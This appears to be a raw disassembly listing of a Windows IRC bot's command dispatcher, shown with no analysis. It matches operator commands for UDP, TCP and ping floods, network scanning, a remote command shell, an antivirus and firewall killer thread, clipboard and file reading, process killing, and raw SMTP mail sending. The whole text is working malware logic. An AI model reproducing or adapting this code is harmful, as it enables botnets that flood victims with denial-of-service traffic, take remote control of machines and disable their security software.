push [ebp+ebx+var_A0]
push 9
push offset aScan_1 ; "Scan"
push offset aScan_0 ; "[SCAN]"
jmp loc_40C14E
; ---------------------------------------------------------------------------
loc_4089A3: ; CODE XREF: sub_4078FA+108F�j
push 0Ah
mov edi, eax
mov esi, offset aScanstats ; "scanstats"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C122
push 6
mov edi, eax
mov esi, offset aStats ; "stats"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C122
push 0Ah
mov edi, eax
mov esi, offset aReconnect ; "reconnect"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C101
push 2
mov edi, eax
mov esi, offset aR ; "r"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C101
push 0Bh
mov edi, eax
mov esi, offset aDisconnect ; "disconnect"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C0DF
push 3
mov edi, eax
mov esi, offset aDc ; "dc"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C0DF
push 5
mov edi, eax
mov esi, offset aQuit_0 ; "quit"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C095
push 2
mov edi, eax
mov esi, offset aQ ; "q"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C095
push 7
mov edi, eax
mov esi, offset aStatus ; "status"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C056
push 2
mov edi, eax
mov esi, offset aS_3 ; "s"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C056
push 3
mov edi, eax
mov esi, offset aId ; "id"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C01E
push 2
mov edi, eax
mov esi, offset aI_0 ; "i"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C01E
push 7
mov edi, eax
mov esi, offset aReboot ; "reboot"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_408AE5
call sub_4058F3
test eax, eax
mov eax, offset aMainRebootingS ; "[MAIN]: Rebooting system."
jnz short loc_408AB6
mov eax, offset aMainFailedToRe ; "[MAIN]: Failed to reboot system."
loc_408AB6: ; CODE XREF: sub_4078FA+11B5�j
push eax
lea eax, [ebp+var_2E0]
push eax
call sub_412BB5
push 0
push [ebp+var_4]
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
add esp, 1Ch
jmp loc_40C4A1
; ---------------------------------------------------------------------------
loc_408AE5: ; CODE XREF: sub_4078FA+11A7�j
push 8
mov edi, eax
mov esi, offset aThreads ; "threads"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BF2F
push 2
mov edi, eax
mov esi, offset aT ; "t"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BF2F
push 8
mov edi, eax
mov esi, offset aAliases ; "aliases"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BF0C
push 3
mov edi, eax
mov esi, offset aAl ; "al"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BF0C
push 4
mov edi, eax
mov esi, offset aLog_0 ; "log"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BE19
push 3
mov edi, eax
mov esi, offset aLg ; "lg"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BE19
push 9
mov edi, eax
mov esi, offset aClearlog ; "clearlog"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BDFD
push 4
mov edi, eax
mov esi, offset aClg ; "clg"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BDFD
push 8
mov edi, eax
mov esi, offset aNetinfo ; "netinfo"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BDC2
push 3
mov edi, eax
mov esi, offset aNi ; "ni"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BDC2
push 8
mov edi, eax
mov esi, offset aSysinfo ; "sysinfo"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BD96
push 3
mov edi, eax
mov esi, offset aSi ; "si"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BD96
push 8
mov edi, eax
mov esi, offset aDestroy ; "destroy"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BD19
push 0Bh
mov edi, eax
mov esi, offset aErradicate ; "erradicate"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BD19
push 6
mov edi, eax
mov esi, offset aProcs ; "procs"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BBF3
push 3
mov edi, eax
mov esi, offset aPs ; "ps"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BBF3
push 7
mov edi, eax
mov esi, offset aUptime ; "uptime"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BB6C
push 3
mov edi, eax
mov esi, offset aUp ; "up"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BB6C
push 0Ah
mov edi, eax
mov esi, offset aDriveinfo ; "driveinfo"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BB4F
push 4
mov edi, eax
mov esi, offset aDrv ; "drv"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BB4F
push 9
mov edi, eax
mov esi, offset aTestdlls ; "testdlls"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BB36
push 4
mov edi, eax
mov esi, offset aDll ; "dll"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BB36
push 8
mov edi, eax
mov esi, offset aOpencmd ; "opencmd"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BAF7
push 5
mov edi, eax
mov esi, offset aOcmd ; "ocmd"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BAF7
push 8
mov edi, eax
mov esi, offset aCmdstop ; "cmdstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_408CED
push [ebp+ebx+var_A0]
push 8
push offset aRemoteShell ; "Remote shell"
push offset aCmd_0 ; "[CMD]"
jmp loc_40C14E
; ---------------------------------------------------------------------------
loc_408CED: ; CODE XREF: sub_4078FA+13D9�j
push 4
mov edi, eax
mov esi, offset aWho ; "who"
pop ecx
xor edx, edx
repe cmpsb
jnz loc_40902C
cmp [ebp+var_C], edx
jnz short loc_408D20
push edx
push [ebp+var_4]
push offset aLoginList ; "-[Login List]-"
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
add esp, 14h
loc_408D20: ; CODE XREF: sub_4078FA+140A�j
mov edi, [ebp+arg_18]
xor esi, esi
loc_408D25: ; CODE XREF: sub_4078FA+1472�j
cmp byte ptr [edi], 0
lea eax, [edi+1]
jnz short loc_408D32
mov eax, offset aEmpty ; "<Empty>"
loc_408D32: ; CODE XREF: sub_4078FA+1431�j
push eax
push esi
lea eax, [ebp+var_2E0]
push offset aD_S ; "%d. %s"
push eax
call sub_412BB5
push 1
push [ebp+var_4]
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
add esp, 24h
inc esi
add edi, 80h
cmp esi, 2
jl short loc_408D25
push offset aMainLoginListC ; "[MAIN]: Login list complete."
call sub_401C33
mov eax, [ebp+var_20]
pop ecx
loc_408D7C: ; CODE XREF: sub_4078FA+22DD�j
; sub_4078FA+4BC1�j
mov ecx, [ebp+ebx+var_94]
test ecx, ecx
mov [ebp+var_14], ecx
jz loc_407B7B
push 8
mov edi, eax
mov esi, offset aAdvscan ; "advscan"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CB69
push 4
mov edi, eax
mov esi, offset aAsc ; "asc"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CB69
push 9
mov edi, eax
mov esi, offset aUdpflood ; "udpflood"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CA12
push 4
mov edi, eax
mov esi, offset aUdp ; "udp"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CA12
push 2
mov edi, eax
mov esi, offset aU ; "u"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CA12
push 0Ah
mov edi, eax
mov esi, offset aPingflood ; "pingflood"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C8CF
push 5
mov edi, eax
mov esi, offset aPing_0 ; "ping"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C8CF
push 2
mov edi, eax
mov esi, offset aP ; "p"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C8CF
push 9
mov edi, eax
mov esi, offset aTcpflood ; "tcpflood"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C6C4
push 4
mov edi, eax
mov esi, offset aTcp ; "tcp"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C6C4
push 6
mov edi, eax
mov esi, offset aEmail ; "email"
pop ecx
xor edx, edx
repe cmpsb
jnz loc_40C4CE
mov eax, [ebp+ebx+var_A0]
lea edx, [ebp+var_B70]
sub edx, eax
loc_408E79: ; CODE XREF: sub_4078FA+1587�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_408E79
push [ebp+ebx+var_9C]
call sub_412F42
mov esi, eax
mov eax, [ebp+ebx+var_98]
lea edx, [ebp+var_18E8]
pop ecx
sub edx, eax
loc_408EA1: ; CODE XREF: sub_4078FA+15AF�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_408EA1
mov eax, [ebp+var_14]
lea edx, [ebp+var_1340]
sub edx, eax
loc_408EB6: ; CODE XREF: sub_4078FA+15C4�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_408EB6
push offset asc_41FA74 ; " "
push offset a_ ; "_"
push [ebp+ebx+var_90]
call sub_40556E
add esp, 0Ch
lea edx, [ebp+var_19E8]
loc_408EDF: ; CODE XREF: sub_4078FA+15ED�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_408EDF
lea eax, [ebp+var_1D78]
push eax
push 101h
call dword_4334B0
lea eax, [ebp+var_B70]
push eax
call dword_433500
push 6
push 1
push 2
mov ebx, eax
call dword_4334A0
mov edi, eax
mov [ebp+var_C8], 2
mov eax, [ebx+0Ch]
mov eax, [eax]
mov eax, [eax]
push esi
mov [ebp+var_C4], eax
call dword_4335EC
mov [ebp+var_C6], ax
lea eax, [ebp+var_19E8]
push eax
lea eax, [ebp+var_18E8]
push eax
lea eax, [ebp+var_19E8]
push eax
lea eax, [ebp+var_1340]
push eax
lea eax, [ebp+var_18E8]
push eax
lea eax, [ebp+var_2178]
push offset aHeloRndnickMai ; "helo $rndnick\nmail from: <%s>\nrcpt to: "...
push eax
call sub_412BB5
add esp, 1Ch
push 10h
lea eax, [ebp+var_C8]
push eax
push edi
call dword_433458
xor ebx, ebx
push ebx
mov esi, 100h
push esi
lea eax, [ebp+var_15E4]
push eax
push edi
call dword_433414
lea eax, [ebp+var_15E4]
lea ecx, [eax+1]
loc_408FA3: ; CODE XREF: sub_4078FA+16AE�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_408FA3
push ebx
sub eax, ecx
push eax
lea eax, [ebp+var_2178]
push eax
push edi
call dword_433534
push ebx
push esi
lea eax, [ebp+var_15E4]
push eax
push edi
call dword_433414
push edi
call dword_4335AC
call dword_4335B8
lea eax, [ebp+var_1340]
push eax
lea eax, [ebp+var_2E0]
push offset aEmailMessageSe ; "[EMAIL]: Message sent to %s."
push eax
call sub_412BB5
add esp, 0Ch
cmp [ebp+var_C], ebx
jnz short loc_409015
push ebx
loc_408FFA: ; CODE XREF: sub_4078FA+35BC�j
; sub_4078FA+3665�j
push [ebp+var_4]
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
loc_40900D: ; CODE XREF: sub_4078FA+2DA6�j
call sub_4045DD
add esp, 14h
loc_409015: ; CODE XREF: sub_4078FA+16FD�j
; sub_4078FA+2D8E�j ...
mov esi, [ebp+arg_24]
loc_409018: ; CODE XREF: sub_4078FA+35FA�j
; sub_4078FA+361D�j ...
lea eax, [ebp+var_2E0]
push eax
call sub_401C33
pop ecx
mov eax, esi
jmp loc_407B7E
; ---------------------------------------------------------------------------
loc_40902C: ; CODE XREF: sub_4078FA+1401�j
push 8
mov edi, eax
mov esi, offset aGetclip ; "getclip"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BAB3
push 3
mov edi, eax
mov esi, offset aGc ; "gc"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BAB3
push 9
mov edi, eax
mov esi, offset aFlusharp ; "flusharp"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BA88
push 5
mov edi, eax
mov esi, offset aFarp ; "farp"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BA88
push 9
mov edi, eax
mov esi, offset aFlushdns ; "flushdns"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BA58
push 5
mov edi, eax
mov esi, offset aFdns ; "fdns"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BA58
push 0Ah
mov edi, eax
mov esi, offset aCurrentip ; "currentip"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BA1E
push 4
mov edi, eax
mov esi, offset aCip ; "cip"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BA1E
push 0Dh
mov edi, eax
mov esi, offset aRloginserver ; "rloginserver"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B8E5
push 7
mov edi, eax
mov esi, offset aRlogin ; "rlogin"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B8E5
push 0Bh
mov edi, eax
mov esi, offset aHttpserver ; "httpserver"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B764
push 5
mov edi, eax
mov esi, offset aHttp ; "http"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B764
push 0Bh
mov edi, eax
mov esi, offset aTftpserver ; "tftpserver"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B60D
push 5
mov edi, eax
mov esi, offset aTftp ; "tftp"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B60D
push 8
mov edi, eax
mov esi, offset aScanall ; "scanall"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B2D2
push 3
mov edi, eax
mov esi, offset aSa ; "sa"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B2D2
mov ecx, [ebp+ebx+var_A0]
test ecx, ecx
mov [ebp+var_8], ecx
jz loc_407B7B
push 5
mov edi, eax
mov esi, offset aNick_0 ; "nick"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B2AD
push 2
mov edi, eax
mov esi, offset aN ; "n"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B2AD
push 5
mov edi, eax
mov esi, offset aJoin ; "join"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B289
push 2
mov edi, eax
mov esi, offset aJ ; "j"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B289
push 5
mov edi, eax
mov esi, offset aPart_0 ; "part"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B26F
push 3
mov edi, eax
mov esi, offset aPt ; "pt"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B26F
push 4
mov edi, eax
mov esi, offset aRaw ; "raw"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B238
push 2
mov edi, eax
mov esi, offset aR ; "r"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B238
push 0Bh
mov edi, eax
mov esi, offset aKillthread ; "killthread"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B17E
push 2
mov edi, eax
mov esi, offset aK ; "k"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B17E
push 7
mov edi, eax
mov esi, offset aC_quit ; "c_quit"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B0D0
push 4
mov edi, eax
mov esi, offset aC_q ; "c_q"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B0D0
push 0Ah
mov edi, eax
mov esi, offset aC_rndnick ; "c_rndnick"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B07F
push 5
mov edi, eax
mov esi, offset aC_rn ; "c_rn"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B07F
push 7
mov edi, eax
mov esi, offset aPrefix ; "prefix"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B066
push 3
mov edi, eax
mov esi, offset aPr ; "pr"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B066
push 5
mov edi, eax
mov esi, offset aOpen ; "open"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B030
push 2
mov edi, eax
mov esi, offset aO ; "o"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B030
push 7
mov edi, eax
mov esi, offset aServer ; "server"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B007
push 3
mov edi, eax
mov esi, offset aSe ; "se"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B007
push 4
mov edi, eax
mov esi, offset aDns ; "dns"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AF97
push 3
mov edi, eax
mov esi, offset aDn ; "dn"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AF97
push 9
mov edi, eax
mov esi, offset aKillproc ; "killproc"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AF64
push 3
mov edi, eax
mov esi, offset aKp ; "kp"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AF64
push 0Ch
mov edi, eax
mov esi, offset aKilldelproc ; "killdelproc"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AF1C
push 4
mov edi, eax
mov esi, offset aKdp ; "kdp"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AF1C
push 5
mov edi, eax
mov esi, offset aKill ; "kill"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AEBB
push 3
mov edi, eax
mov esi, offset aKi ; "ki"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AEBB
push 7
mov edi, eax
mov esi, offset aDelete ; "delete"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AE69
push 4
mov edi, eax
mov esi, offset aDel ; "del"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AE69
push 5
mov edi, eax
mov esi, offset aList_0 ; "list"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AE49
push 3
mov edi, eax
mov esi, offset aLi ; "li"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AE49
push 8
mov edi, eax
mov esi, offset aMirccmd ; "mirccmd"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40ADD0
push 5
mov edi, eax
mov esi, offset aMirc ; "mirc"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40ADD0
push 4
mov edi, eax
mov esi, offset aCmd ; "cmd"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AD74
push 3
mov edi, eax
mov esi, offset aCm ; "cm"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AD74
push 9
mov edi, eax
mov esi, offset aReadfile ; "readfile"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40ACE0
push 3
mov edi, eax
mov esi, offset aRf ; "rf"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40ACE0
push 4
mov edi, eax
mov esi, offset aNet ; "net"
pop ecx
xor edx, edx
repe cmpsb
jnz loc_40971F
xor eax, eax
cmp dword_433600, eax
jz short loc_4094A6
cmp dword_433628, eax
jz short loc_4094A6
push offset aNetFailedToLoa ; "[NET]: Failed to load advapi32.dll or n"...
jmp loc_409714
; ---------------------------------------------------------------------------
loc_4094A6: ; CODE XREF: sub_4078FA+1B98�j
; sub_4078FA+1BA0�j
cmp [ebp+var_14], eax
jz loc_40AE14
mov eax, [ebp+ebx+var_9C]
and [ebp+arg_0], 0
test eax, eax
mov [ebp+var_10], eax
jz short loc_4094CF
push eax
push [ebp+var_14]
call sub_413920
pop ecx
pop ecx
mov [ebp+arg_0], eax
loc_4094CF: ; CODE XREF: sub_4078FA+1BC5�j
mov edx, [ebp+var_8]
push 6
mov edi, edx
mov esi, offset aStart ; "start"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_40953D
cmp [ebp+var_10], eax
jz short loc_40950B
push [ebp+arg_0]
push 3
loc_4094EC: ; CODE XREF: sub_4078FA+1C58�j
; sub_4078FA+1C6F�j ...
call sub_40668A
push eax
lea eax, [ebp+var_2E0]
push offset aS_1 ; "%s"
push eax
call sub_412BB5
add esp, 14h
jmp loc_40AE14
; ---------------------------------------------------------------------------
loc_40950B: ; CODE XREF: sub_4078FA+1BEB�j
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
call sub_405DC5
add esp, 0Ch
test eax, eax
lea eax, [ebp+var_2E0]
jz short loc_409533
push offset aNetServiceList ; "[NET]: Service list completed."
jmp loc_40AE0C
; ---------------------------------------------------------------------------
loc_409533: ; CODE XREF: sub_4078FA+1C2D�j
push offset aNetServiceLi_0 ; "[NET]: Service list failed."
jmp loc_40AE0C
; ---------------------------------------------------------------------------
loc_40953D: ; CODE XREF: sub_4078FA+1BE6�j
push 5
mov edi, edx
mov esi, offset aStop ; "stop"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_409554
push [ebp+arg_0]
push 4
jmp short loc_4094EC
; ---------------------------------------------------------------------------
loc_409554: ; CODE XREF: sub_4078FA+1C51�j
push 6
mov edi, edx
mov esi, offset aPause ; "pause"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_40956B
push [ebp+arg_0]
push 5
jmp short loc_4094EC
; ---------------------------------------------------------------------------
loc_40956B: ; CODE XREF: sub_4078FA+1C68�j
push 9
mov edi, edx
mov esi, offset aContinue ; "continue"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_409585
push [ebp+arg_0]
push 6
jmp loc_4094EC
; ---------------------------------------------------------------------------
loc_409585: ; CODE XREF: sub_4078FA+1C7F�j
push 7
mov edi, edx
mov esi, offset aDelete ; "delete"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_40959F
push [ebp+arg_0]
push 1
jmp loc_4094EC
; ---------------------------------------------------------------------------
loc_40959F: ; CODE XREF: sub_4078FA+1C99�j
push 6
mov edi, edx
mov esi, offset aShare ; "share"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_409623
cmp [ebp+var_10], eax
jz short loc_4095EF
cmp [ebp+var_448], al
jz short loc_4095C4
push eax
push [ebp+var_10]
push 1
jmp short loc_4095D0
; ---------------------------------------------------------------------------
loc_4095C4: ; CODE XREF: sub_4078FA+1CC0�j
push [ebp+ebx+var_98]
push [ebp+var_10]
push 0
loc_4095D0: ; CODE XREF: sub_4078FA+1CC8�j
call sub_406702
push eax
lea eax, [ebp+var_2E0]
push offset aS_1 ; "%s"
push eax
call sub_412BB5
add esp, 18h
jmp loc_40AE14
; ---------------------------------------------------------------------------
loc_4095EF: ; CODE XREF: sub_4078FA+1CB8�j
push 0
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4067C0
add esp, 10h
test eax, eax
lea eax, [ebp+var_2E0]
jz short loc_409619
push offset aNetShareListCo ; "[NET]: Share list completed."
jmp loc_40AE0C
; ---------------------------------------------------------------------------
loc_409619: ; CODE XREF: sub_4078FA+1D13�j
push offset aNetShareListFa ; "[NET]: Share list failed."
jmp loc_40AE0C
; ---------------------------------------------------------------------------
loc_409623: ; CODE XREF: sub_4078FA+1CB3�j
push 5
mov edi, edx
mov esi, offset aUser ; "user"
pop ecx
xor eax, eax
repe cmpsb
jnz loc_4096C5
cmp [ebp+var_10], eax
jz short loc_409691
cmp [ebp+var_448], al
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
jz short loc_409658
push eax
push [ebp+var_10]
push 1
jmp short loc_409672
; ---------------------------------------------------------------------------
loc_409658: ; CODE XREF: sub_4078FA+1D54�j
mov ebx, [ebp+ebx+var_98]
test ebx, ebx
jz short loc_40966B
push ebx
push [ebp+var_10]
push 0
jmp short loc_409672
; ---------------------------------------------------------------------------
loc_40966B: ; CODE XREF: sub_4078FA+1D67�j
push 0
push [ebp+var_10]
push 2
loc_409672: ; CODE XREF: sub_4078FA+1D5C�j
; sub_4078FA+1D6F�j
call sub_4068DF
push eax
lea eax, [ebp+var_2E0]
push offset aS_1 ; "%s"
push eax
call sub_412BB5
add esp, 24h
jmp loc_40AE14
; ---------------------------------------------------------------------------
loc_409691: ; CODE XREF: sub_4078FA+1D40�j
push 0
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4069A9
add esp, 10h
test eax, eax
lea eax, [ebp+var_2E0]
jz short loc_4096BB
push offset aNetUserListCom ; "[NET]: User list completed."
jmp loc_40AE0C
; ---------------------------------------------------------------------------
loc_4096BB: ; CODE XREF: sub_4078FA+1DB5�j
push offset aNetUserListFai ; "[NET]: User list failed."
jmp loc_40AE0C
; ---------------------------------------------------------------------------
loc_4096C5: ; CODE XREF: sub_4078FA+1D37�j
push 5
mov edi, edx
mov esi, offset aSend ; "send"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_40970F
cmp [ebp+var_10], eax
jz short loc_409708
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4065CE
push eax
lea eax, [ebp+var_2E0]
push offset aS_1 ; "%s"
push eax
call sub_412BB5
add esp, 1Ch
jmp loc_40AE14
; ---------------------------------------------------------------------------
loc_409708: ; CODE XREF: sub_4078FA+1DDE�j
push offset aNetNoMessageSp ; "[NET]: No message specified."
jmp short loc_409714
; ---------------------------------------------------------------------------
loc_40970F: ; CODE XREF: sub_4078FA+1DD9�j
push offset aNetCommandUnkn ; "[NET]: Command unknown."
loc_409714: ; CODE XREF: sub_4078FA+1BA7�j
; sub_4078FA+1E13�j
lea eax, [ebp+var_2E0]
jmp loc_40AE0C
; ---------------------------------------------------------------------------
loc_40971F: ; CODE XREF: sub_4078FA+1B8A�j
push 8
mov edi, eax
mov esi, offset aGethost ; "gethost"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40ABFB
push 3
mov edi, eax
mov esi, offset aGh ; "gh"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40ABFB
push 0Bh
mov edi, eax
mov esi, offset aAvfwkiller ; "avfwkiller"
pop ecx
xor edx, edx
repe cmpsb
jnz loc_40984D
mov edi, [ebp+var_8]
push 6
mov esi, offset aStart ; "start"
pop ecx
xor eax, eax
repe cmpsb
jnz loc_409820
lea eax, [ebp+var_2E0]
push offset aAvfwAvFwBotKil ; "[AVFW]: AV/FW/BOT Killer active."
push eax
call sub_412BB5
push [ebp+ebx+var_9C]
xor edi, edi
push 1
push offset aKillerThread ; "Killer Thread"
push offset aAvfw ; "[AVFW]"
push 1
push edi
push [ebp+var_9C]
push [ebp+arg_4]
call sub_411120
push edi
lea eax, [ebp+var_2E0]
push 1
push eax
call sub_410EEA
add esp, 34h
mov esi, eax
lea eax, [ebp+var_18]
push eax
push edi
push edi
push offset sub_4074FD
push edi
push edi
call ds:dword_41F00C
imul esi, 234h
cmp eax, edi
mov dword_43434C[esi], eax
jnz short loc_4097F9
call ds:dword_41F008
push eax
lea eax, [ebp+var_2E0]
push offset aAvfwFailedToSt ; "[AVFW]: Failed to start AV/FW killer th"...
push eax
call sub_412BB5
add esp, 0Ch
loc_4097F9: ; CODE XREF: sub_4078FA+1EE2�j
lea eax, [ebp+var_2E0]
push eax
call sub_401C33
cmp [ebp+var_C], edi
pop ecx
jnz loc_407B7B
push 0
push [ebp+var_4]
lea eax, [ebp+var_2E0]
push eax
jmp loc_40BC13
; ---------------------------------------------------------------------------
loc_409820: ; CODE XREF: sub_4078FA+1E70�j
mov edi, [ebp+var_8]
push 5
mov esi, offset aStop ; "stop"
pop ecx
xor eax, eax
repe cmpsb
jnz loc_407B7B
push [ebp+ebx+var_9C]
push 1
push offset aKillerThread ; "Killer Thread"
push offset aAvfw ; "[AVFW]"
jmp loc_40C14E
; ---------------------------------------------------------------------------
loc_40984D: ; CODE XREF: sub_4078FA+1E5B�j
mov ecx, [ebp+ebx+var_9C]
test ecx, ecx
mov [ebp+var_10], ecx
jz loc_407B7B
push 9
mov edi, eax
mov esi, offset aAddalias ; "addalias"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AB88
push 3
mov edi, eax
mov esi, offset aAa ; "aa"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AB88
push 8
mov edi, eax
mov esi, offset aPrivmsg_0 ; "privmsg"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AB1D
push 3
mov edi, eax
mov esi, offset aPm_0 ; "pm"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AB1D
push 7
mov edi, eax
mov esi, offset aAction ; "action"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AA9A
push 2
mov edi, eax
mov esi, offset aA_1 ; "a"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AA9A
push 6
mov edi, eax
mov esi, offset aCycle ; "cycle"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AA34
push 3
mov edi, eax
mov esi, offset aCy ; "cy"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AA34
push 5
mov edi, eax
mov esi, offset aMode ; "mode"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A9FA
push 2
mov edi, eax
mov esi, offset aM ; "m"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A9FA
push 6
mov edi, eax
mov esi, offset aC_raw ; "c_raw"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A98B
push 4
mov edi, eax
mov esi, offset aC_r ; "c_r"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A98B
push 7
mov edi, eax
mov esi, offset aC_mode ; "c_mode"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A905
push 4
mov edi, eax
mov esi, offset aC_m ; "c_m"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A905
push 7
mov edi, eax
mov esi, offset aC_nick ; "c_nick"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A894
push 4
mov edi, eax
mov esi, offset aC_n ; "c_n"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A894
